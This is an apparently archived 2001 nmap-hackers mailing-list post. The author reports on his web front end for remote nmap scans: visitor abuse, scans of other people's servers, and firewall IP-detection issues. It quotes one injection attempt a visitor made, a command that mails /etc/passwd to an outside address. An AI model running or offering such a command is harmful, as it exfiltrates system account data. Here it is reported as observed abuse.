hi nmap experts/users
thanx for all your feedbacks and comments....
--
-- very good job to fyodor for his/their nmap work....
--
thought i'd send an update... ( at least i thought it's interesting ...
- so far, we've had about 3000 scans done ....
cat nmap.log_file | wc -l
2927
-
- people trying to scan outside their domains
- ( after the first day of open/anonymous scans was closed )
-
grep ERROR2: nmap.log_file | wc -l
397
- one guy/girl tried to do:
mail -s test gottatry_at_theirdomain.com < /etc/passwd
- so far, my ISP sent me an emai, of why i scanned someones
server .... ( and told the ISP security guyz that i have this
nmap front end thingie to help simplify security issues on servers
and have not heard back since ....
- since i dont know who got scanned, i couldn't tell um
who performed that scan... etc
- one other scan occurred to someone and i'm still trying to
find out how and who scanned um ....
- other issue .... more importantly ???
- some of you are behind a firewall and/or IP masquerade
so the $ENV{REMOTE_ADDR} and $ENV{REMOTE_HOST} is the
wrong ip# to be scanning ...
- i'd guess we'd have to add some javascript code to
identify your real ip# ???
-
- overall ... was/is a fun project ... simple too...
-
thanx for your comments
alvin
http://www.Linux-Sec.net/Audit/nmap.test.gwif.html
- there's other tests too..
- open relays
- dns tests
- filesystem and passwd tests
>hi ya nmap-experts...
>
>for fun.... i added a page that one can specify the ip#
>for an nmap scan ... for services/daemons to close off
>
>http://www.Linux-Sec.net/Audit/nmap.test.html
>
>
>what do you nmap-experts think ???
>
--------------------------------------------------
For help using this (nmap-hackers) mailing list, send a blank email to
nmap-hackers-help_at_insecure.org . List run by ezmlm-idx (www.ezmlm.org).
Received on Jun 28 2001
Intro
